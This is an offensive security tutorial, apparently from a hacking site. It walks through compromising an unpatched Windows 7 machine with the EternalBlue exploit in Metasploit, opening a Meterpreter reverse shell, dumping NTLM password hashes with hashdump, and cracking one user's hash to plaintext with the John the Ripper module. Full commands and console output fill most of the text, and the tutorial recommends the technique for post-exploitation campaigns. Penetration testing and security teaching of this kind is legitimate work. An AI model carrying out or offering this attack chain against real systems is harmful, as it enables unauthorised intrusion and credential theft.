How to Use John the Ripper in Metasploit to Quickly Crack Windows Hashes

Dec 19, 2019 03:00 PM
636979236149131671.jpg

There are many password-cracking tools out there, but one of the mainstays has always been John the Ripper. It's a powerful piece of software that can be configured and used in many different ways. Metasploit actually contains a little-known module version of JTR that can be used to quickly crack weak passwords, so let's explore it in an attempt to save precious time and effort.

We will be using an unpatched version Windows 7 as the target, so if you have a copy lying around, feel free to use it. The method of exploitation doesn't matter so much here, as long as you can get a Meterpreter session on the target. The John the Ripper module should work on any version of Windows we can grab the hashes from. In this tutorial, we will obtain the hash of an additional user that has logged onto the system (admin2).

Step 1: Compromise the PC

To begin, we will need to compromise the target and get a Meterpreter session. Since we know the target is running an unpatched version of Windows 7, we can use EternalBlue to quickly exploit the system from our Kali box.

We will need Metasploit's built-in database up and running for the John the Ripper module to work later, so start it with the following command:

~# service postgresql start

Then, fire up Metasploit by typing msfconsole in the terminal:

~# msfconsole

[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

Next, load the EternalBlue exploit module with the use command:

msf5 > use exploit/windows/smb/ms17_010_eternalblue

Set the appropriate options, and type run to launch:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.0.1:1337
[+] 10.10.0.104:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49212) at 2019-06-27 11:56:09 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

We now have a working Meterpreter session on the target.

Step 2: Grab Some Hashes

The next thing we need to do is obtain the hashes of any users on the system. Meterpreter has an awesome feature called hashdump that will automatically dump the hashes for us:

meterpreter > hashdump

admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Unfortunately, all this does is display them on-screen. We need to save these to the database so the JTR module can work its magic. First, background the current session:

meterpreter > background

[*] Backgrounding session 1...

Then, we can use the hashdump post module to grab the hashes from our target. Load it with the use command:

msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/hashdump

Metasploit post modules work by running on an existing session, which is why we need to background the session in the first place. We can type options to display the settings for the module:

msf5 post(windows/gather/hashdump) > options

Module options (post/windows/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

All we need to do is specify the session number we want to run this on. Use the set command to set the session to 1 (or whatever session number that is running in the background):

msf5 post(windows/gather/hashdump) > set session 1

session => 1

Now, simply type run and the module will gather the hashes:

msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1c8cfe9e1146578ee29d759b84a0ab70...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

admin2:"shots"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::

[*] Post module execution completed

We can see that we got the same hashes as before, but we also found a password hint for admin2. Nice. Now if we type creds at the prompt, Metasploit will display all the credentials that are currently stored in the database:

msf5 post(windows/gather/hashdump) > creds

Credentials
===========

host         origin       service        public         private                                                            realm  private_type  JtR Format
----         ------       -------        ------         -------                                                            -----  ------------  ----------
10.10.0.104  10.10.0.104  445/tcp (smb)  guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
10.10.0.104  10.10.0.104  445/tcp (smb)  administrator  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
10.10.0.104  10.10.0.104  445/tcp (smb)  admin2         aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7         NTLM hash     nt,lm

This shows us the host, service, and associated credentials, as well as the hash type. Now all that's left to do is crack that hash.

Step 3: Crack the Hash

Metasploit's John the Ripper module is extremely useful when you need to quickly crack hashes — without needing to bother loading up John externally. It is also useful to try as a first pass since it usually takes no time at all and could potentially uncover weak passwords.

Now that we have our hashes stored in the database, load the JTR module with the use command:

msf5 post(windows/gather/hashdump) > use auxiliary/analyze/jtr_windows_fast

We can take a look at the available options for this module:

msf5 auxiliary(analyze/jtr_windows_fast) > options

Module options (auxiliary/analyze/jtr_windows_fast):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CONFIG                                 no        The path to a John config file to use instead of the default
   CUSTOM_WORDLIST                        no        The path to an optional custom wordlist
   ITERATION_TIMEOUT                      no        The max-run-time for each iteration of cracking
   JOHN_PATH                              no        The absolute path to the John the Ripper executable
   KORELOGIC             false            no        Apply the KoreLogic rules to Wordlist Mode(slower)
   MUTATE                false            no        Apply common mutations to the Wordlist (SLOW)
   POT                                    no        The path to a John POT file to use instead of the default
   USE_CREDS             true             no        Use existing credential data saved in the database
   USE_DB_INFO           true             no        Use looted database schema info to seed the wordlist
   USE_DEFAULT_WORDLIST  true             no        Use the default metasploit wordlist
   USE_HOSTNAMES         true             no        Seed the wordlist with hostnames from the workspace
   USE_ROOT_WORDS        true             no        Use the Common Root Words Wordlist

There are options to use a custom wordlist or the powerful KoreLogic rules, but for now, we will keep the default options as they are. Type run to kick it off:

msf5 auxiliary(analyze/jtr_windows_fast) > run

[*] Hashes Written out to /tmp/hashes_tmp20190627-25408-1bio0bp
[*] Wordlist file written out to /tmp/jtrtmp20190627-25408-8tghjo
[*] Cracking lm hashes in normal wordlist mode...
Using default input encoding: UTF-8
Using default target encoding: CP850
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2019-06-27 12:16) 0g/s 261783p/s 261783c/s 261783C/s PLANAR..VAGRANT
Session completed
[*] Cracking lm hashes in single mode...
Using default input encoding: UTF-8
Using default target encoding: CP850
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 DONE (2019-06-27 12:16) 0g/s 2527Kp/s 2527Kc/s 2527KC/s LLB1903..E1900
Session completed
[*] Cracking lm hashes in incremental mode (Digits)...
Using default input encoding: UTF-8
Using default target encoding: CP850
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2019-06-27 12:16) 0g/s 13386Kp/s 13386Kc/s 13386KC/s 0766269..0769743
Session completed
[*] Cracked Passwords this run:
[*] Cracking nt hashes in normal wordlist mode...
Using default input encoding: UTF-8
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2019-06-27 12:16) 0g/s 959350p/s 959350c/s 1918KC/s yesenia..yodelli
Session completed
[*] Cracking nt hashes in single mode...
Using default input encoding: UTF-8
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:07 DONE (2019-06-27 12:17) 0.1253g/s 8097Kp/s 8097Kc/s 11648KC/s yellowy1900..yodelli1900
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
[*] Cracking nt hashes in incremental mode (Digits)...
Using default input encoding: UTF-8
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 DONE (2019-06-27 12:17) 0g/s 20885Kp/s 20885Kc/s 20885KC/s 73673920..73673952
Session completed

We can see it starts out by attempting to crack any LM hashes, first in wordlist mode, followed by single-mode, and finally, incremental mode. Next, it follows the same procedure for any NT hashes that are present. Once it completes, it shows us any cracked passwords that it uncovered, along with the associated username:

[*] Cracked Passwords this run:
[+] admin2:tequila99
[-] Auxiliary failed: KeyError key not found: :address
[-] Call stack:
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:551:in `fetch'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:551:in `create_credential_service'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:301:in `block in create_credential_login'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:300:in `create_credential_login'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:27:in `block (2 levels) in create_cracked_credential'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation/delegation.rb:46:in `each'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation/delegation.rb:46:in `each'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:25:in `block in create_cracked_credential'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:166:in `data_service_operation'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:15:in `create_cracked_credential'
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:26:in `create_cracked_credential'
[-]   /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:127:in `block (2 levels) in run'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:173:in `block (2 levels) in each_cracked_password'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:172:in `each_line'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:172:in `block in each_cracked_password'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:171:in `popen'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/jtr/cracker.rb:171:in `each_cracked_password'
[-]   /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:90:in `block in run'
[-]   /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:46:in `each'
[-]   /usr/share/metasploit-framework/modules/auxiliary/analyze/jtr_windows_fast.rb:46:in `run'
[*] Auxiliary module execution completed

As an added bonus, when we use the creds command to view stored credentials in our database, we can now see the plaintext password is included:

msf5 auxiliary(analyze/jtr_windows_fast) > creds

Credentials
===========

host         origin       service        public         private                                                            realm  private_type  JtR Format
----         ------       -------        ------         -------                                                            -----  ------------  ----------
                                         admin2         tequila99                                                                 Password
10.10.0.104  10.10.0.104  445/tcp (smb)  guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
10.10.0.104  10.10.0.104  445/tcp (smb)  administrator  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
10.10.0.104  10.10.0.104  445/tcp (smb)  admin2         aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7         NTLM hash     nt,lm

Wrapping Up

In this tutorial, we learned about Metasploit's John the Ripper module and how to use it to quickly crack Windows hashes. We first exploited the target using EternalBlue and used the hashdump post module to grab user hashes and store them to the database. Then, we ran the JTR module right in Metasploit and cracked the hash of one of the users. Metasploit's JTR module makes it easy to obtain weak passwords in very little time, and it should be worth a shot in any Windows post-exploitation campaign.

Cover image by Martin Lopez/Pexels; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!